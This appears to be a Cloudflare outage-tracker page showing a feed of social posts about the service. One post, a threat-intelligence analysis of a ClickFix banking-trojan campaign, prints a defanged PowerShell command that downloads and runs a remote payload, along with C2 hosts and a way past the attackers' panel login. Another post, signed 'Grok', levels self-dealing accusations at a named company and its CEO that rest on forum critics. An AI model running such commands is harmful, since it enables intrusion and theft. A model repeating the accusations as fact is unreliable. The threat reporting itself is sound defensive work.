Cloudflare Outage Map

Community Discussion

Tips? Frustrations? Share them here. Useful comments include a description of the problem, city and postal code.

Beware of "support numbers" or "recovery" accounts that might be posted below. Make sure to report and downvote those comments. Avoid posting your personal information.

Cloudflare Issues Reports

Latest outage, problems and issue reports in social media:

• 
  Renan Ferreira (@relferreira) reported 4 minutes ago

  @QuinnyPig @Cloudflare Sad that you need a huge X account to get things fixed. I have multiple support tickets open with them, and I haven't received a response for weeks

• 
  Pablodecortes (@pablodecortes) reported 8 minutes ago

  @cramforce Does it support Cloudflare Workers or only Vercel?

• 
  TheLarioso (@TheLarioso) reported 9 minutes ago

  @brivael You have these massive scripts CloudFlare many are connected to and collect ip:s and check if bots etc. - you could very well just go ip and block those that exist - yes, quite a few but can be done I think You do not need to go to a particular service, you vpn service has an ip.

• 
  Data (@DataDeLaurier) reported 11 minutes ago

  @distributedkv "...and dont require me to use cloudflare or a vpn if i want to self-host also take down the cloud."

• 
  Coffee and Gun Oil (@coffee_oil) reported 14 minutes ago

  @ShamashAran I was on cloudflare ******* with DNS last night. I hate DNS The **** I run locally works fine, but that's because it's me and a text file.

• 
  Rohit Kashyap | AI + Full-Stack (@rohit_jsfreaky) reported 14 minutes ago

  @EddCoates that nginx 500 is the scrapers basically ddosing you for free training data. robots txt is a polite suggestion they ignore now. what actually helps, put cloudflare in front with bot fight mode on, rate limit per asn not per ip since they rotate addresses, and consider a tarpit for the worst offenders. it is not legal so much as unenforceable at their scale, which is the real problem

• 
  bigdatachads (@bigdatachads) reported 16 minutes ago

  I've been building AI phone agents on @Cloudflare for a while now. v1. a Python container, fighting for every millisecond. v2. no container, the whole call on the edge. that was the real work. now that I have the stack down, I spent last weekend messing around. this is v3, a cartoon you talk to that remembers you and gets heckled by a second AI. all on Cloudflare primitives. three teardowns, first one tomorrow. follow along. @CloudflareDev

• 
  Ann the cat herder (@ann1knit) reported 16 minutes ago

  If cloudflare is so buggy and easily broken or hacked, why the frell hasn't someone come up with a better system or solution?

• 
  Richard Sever (@cshperspectives) reported 18 minutes ago

  @manuelrivascruz working on solutions to this. the problem as I'm sure you can imagine is like so many sites we are being hammered by LLM bots in addition to all the DDOS attacks, so (again like many others) use services like Cloudflare to ensure human readers maintain access

• 
  Deborah (@DeborahHat96840) reported 22 minutes ago

  **It's a red flag for self-dealing and questionable valuation in a no-revenue microcap.** In standard U.S. GAAP (especially for OTC companies under Alternative Reporting), a parent like **Hop-on Inc. ($HPNN)** can record an "Investment in Subsidiary" (here, ~$6.5M–$6.7M in Digitalage) on its balance sheet. For a *wholly-owned* subsidiary, full consolidation is typically required under ASC 810—line-by-line assets, liabilities, revenues, and expenses of the sub flow into the parent's statements (with eliminations for intercompany items). Treating it as a non-consolidated "investment" (often at cost or equity method) while claiming it as a subsidiary raises issues: - **Funding source via officer accruals**: Critics (and forum analyses of the Q1 2026 filing) note the asset largely stems from converted unpaid officer compensation/ obligations (primarily to CEO Peter Michaels) rather than cash infusions, external equity/debt, or operations. No cash changed hands for the bulk of the valuation. This creates a circular, related-party dynamic: the same person approves salary accruals, converts them into equity/value in a private entity he controls, and books it as a major asset for the public shell. - **Valuation support**: With HPNN showing $1,187 cash, $0 revenue, ongoing net losses (~$172k in Q1 alone), and a massive accumulated deficit (~$32.8M), there's no independent appraisal, arm's-length investment, or revenue/traction evidence disclosed to back a $6.5M+ carrying value. Digitalage itself has no separate audited financials visible in public disclosures and operates on minimal infrastructure (e.g., Cloudflare free tier per skeptics). - **Disclosure and governance gaps**: Related-party transactions (loans, accruals, conversions) must be disclosed in detail under OTC/SEC rules. Undisclosed or opaque funding for operations (while paying ~$82.5k in officer comp in Q1) can constitute material omissions. The company's governance portal and filings emphasize Digitalage as wholly-owned, yet keep it non-consolidated to avoid exposing internals. This pattern—accruing high officer pay in a dormant shell, converting to "investment" equity in a private vehicle, and promoting the sub aggressively—is common in long-deficit OTC stories. It lets the officer extract value/liability relief while public shareholders bear dilution risk, judgment exposure (e.g., recent Woolen case not fully reflected), and zero operational upside if consolidation never materializes meaningfully. **Bottom line**: It's "well" within the realm of aggressive OTC accounting that prioritizes narrative over verifiable economics. Investors should demand full consolidation details, independent valuation, and related-party footnotes in future filings. High risk of overstatement; DYOR and treat as speculative. NFA. Grok 4:53 a.m. CT 20260616

• 
  Corey Quinn (@QuinnyPig) reported 23 minutes ago

  Man, at this rate I’m gonna have to do a whole new thread with more issues for @Cloudflare to fix.

• 
  Nikhil Agarwal (@nikhildp) reported 27 minutes ago

  @dinasaur_404 @Cloudflare Yes looking for billing cap. How do you test dynamic workers as well as dynamic workflows in local dev? We had a disastrous outcome of losing $800 because the deployed code ran into infinite loop using dynamic workflow. Support team was not at all helpful.

• 
  DFIR Radar (@DFIR_Radar) reported 30 minutes ago

  AI-generated ClickFix lure impersonates a Brazilian 🇧🇷 bank to drop SmartRAT, a PowerShell banking RAT with QR-swap, keylogging, and fake overlay capabilities. The C2 panel had no server-side auth. Key findings: - Full infection chain: typosquatting domain cartaobb[.]com mimics cartaobrb[.]com[.]br, fake Cloudflare CAPTCHA triggers clipboard injection, fake BSOD locks the browser, then victim pastes: powershell "$k8='hxxp://64[.]95[.]13[.]238/st.txt';iex(irm $k8)" into Run. Three-stage PowerShell dropper pulls payload[.]php, AES-CBC decrypts SmartRAT in memory. Hashes: st.txt 297eb45f028d44d750297d2f932b9c91, RAT b17ccdb5531555e43f082d6e77c07227. - SmartRAT (SMART_V25) persists as scheduled task or Windows service named MicrosoftEdgeUpdateCore (T1543.003), copies itself to %APPDATA%\Microsoft\Diagnosis\ETW\msedgeupdate.txt, logs all activity to C:\ProgramData\Microsoft\Diagnosis\ETW\client_debug.log and per-PID logs. - C2 at c[.]windowsupdate-cdn[.]com port 51888 (fallback 162[.]141[.]111[.]227), AES-CBC encrypted over raw TCP. QR-swap feature overlays attacker QR at exact pixel coordinates of the legitimate banking QR to redirect transactions. Monitors window titles for santander, bradesco, itau, nubank, binance, and a dozen more. - The C2 panel (branded MyGood PRO) bypasses auth by checking only localStorage values authToken and currentUser client-side with no server validation, exposing the full admin panel to anyone who sets those keys. #DFIR_Radar

• 
  Sina Meraji (@sinasanm) reported 31 minutes ago

  totally forgot i can replace the scrappy cf onboarding in kimiflare with the new "login with cloudflare" oauth thingy

• 
  Fardeem (@FardeemM) reported 33 minutes ago

  If you're on your way to building a billion dollar company that involves a web app, here are some of my notes on architecting the frontend. if you don't do this, it's probably fine but one day you'll hire someone to fix it but truly that person could be doing some other higher value thing if you make some key optimizations on day 1 you don't even have to learn anything you're gonna tell your agents to do it anyways! okay here it goes: - Make your server code generate a openapi spec which then generates all the relevant client side code. Never do this by hand. Typing backend types instead of generating them should be banned - You need to make a decision on how the client talks to the backend. rest/graphql works in which case please just use tanstack query. other libraries will look similar but tanstack query truly is goated. - if you want linear style sync setups or offline mode, think about this HARD and architect it from day 1. Bolting this on later is so tedious. - People like using plain react router but things have gotten a lot better since then. Try their new framework mode or just even use tanstack router. Use route data loaders. - If you store a lot of state in query params, make that a first class citizen and make sure its type safe. use nuqs or tanstack query. - Most apps just need a single state management situation for server state and thats it. If you have other bespoke needs, i have quite like zustand and xstate/store. - If you have a super interactive app where things come in and out of view, theres a lot of frontend state to maintain, music is playing and what not, lock in and learn xstate. Trust me if you wanna keep ur sanity, you need to model ur frontend as a state machine otherwise you're gonna be deep in useEffect hell - React compiler is here my friends, the days of useMemo and useCallback are gone. Update your priors accordingly - Tailwind is easy and fun but makes it really hard to maintain a large app with consistent styling. You need a "agent-first design system/component library" but maybe this is a rant for another day - Don't be afraid to hack your routing library to fit your needs more closely. A lot of apps have "drawers" to show additional info. You should 100% be able to say "here's a route, make it a drawer" and everything should be handled from there. - Managing loading and error states using isPending and isError is madness. Lean into Suspense and ErrorBoundary. - Figuring out a blessed path for websockets and SSE on day 1 i think will pay dividends in the long term if you're building anything AI related. - If you're building a SPA, don't use next.js. it literally makes no sense. Why would you do this. - Definitely deploy on Cloudflare or vercel. There are other services but trust, there have weird missing features. - Assuming you build something people want, the next job is to build the factory so it can efficiently build the thing. Act accordingly.